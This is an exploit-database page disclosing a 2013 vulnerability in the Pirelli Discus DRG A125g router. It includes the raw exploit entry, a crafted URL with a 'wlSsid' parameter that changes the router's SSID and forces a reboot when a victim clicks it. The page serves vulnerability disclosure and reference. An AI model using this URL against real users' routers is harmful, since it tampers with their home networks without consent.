header-logo
Suggest Exploit
vendor:
Discus DRG A125g
by:
Sebastián Magof
6,4
CVSS
MEDIUM
Remote Change SSID Value
N/A
CWE
Product Name: Discus DRG A125g
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux/Windows
2013

Pirelli Discus DRG A125g remote change SSID value

An attacker can change the SSID value of a Pirelli Discus DRG A125g router by sending a malicious URL to the victim. The URL contains a parameter 'wlSsid' which is where the attacker will enter the new SSID. If the victim clicks on the URL, the modem/router will reboot automatically with the new SSID provided by the attacker.

Mitigation:

Ensure that users are aware of the risks of clicking on malicious URLs. Use a firewall to block malicious URLs.
Source

Exploit-DB raw data:

# Exploit Title: Pirelli Discus DRG A125g remote change SSID value
vulnerability
# Hardware: Pirelli Discus DRG A125g
# Date: 2013/11/23
# Exploit Author: Sebastián Magof
# Tested on: Linux/Windows
# Twitter: @smagof
# Greetz: Family, friends && under guys.
# Special Greetz:
# (\/)
# (**) αlpha
#(")(")


#Exploit:

http://10.0.0.2/wlbasic.wl?wlSsidIdx=0&wlSsid=bysmagof

#info: where the parameter "wlSsid"  is where the attacker will enter the
new SSID. If the victim clicks on the url your modem / router will reboot
automatically with the new SSID provided by the attacker.

Navigation

Suggest Exploit

Services By CQR